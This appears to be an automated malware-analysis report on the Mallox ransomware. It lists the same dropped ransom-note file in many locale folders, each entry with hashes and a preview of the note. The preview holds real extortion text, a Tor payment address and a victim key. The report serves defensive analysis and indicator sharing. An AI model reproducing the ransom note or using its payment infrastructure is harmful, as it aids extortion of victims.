                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\es-US\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\es-UY\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\es-VE\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\et-EE\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\eu-ES\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\fa-IR\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\fi-FI\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\fr-029\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\fr-BE\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\fr-CA\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\fr-CD\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\fr-CH\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\fr-CI\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\fr-CM\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\fr-FR\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\fr-HT\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\fr-LU\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\fr-MA\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\fr-MC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
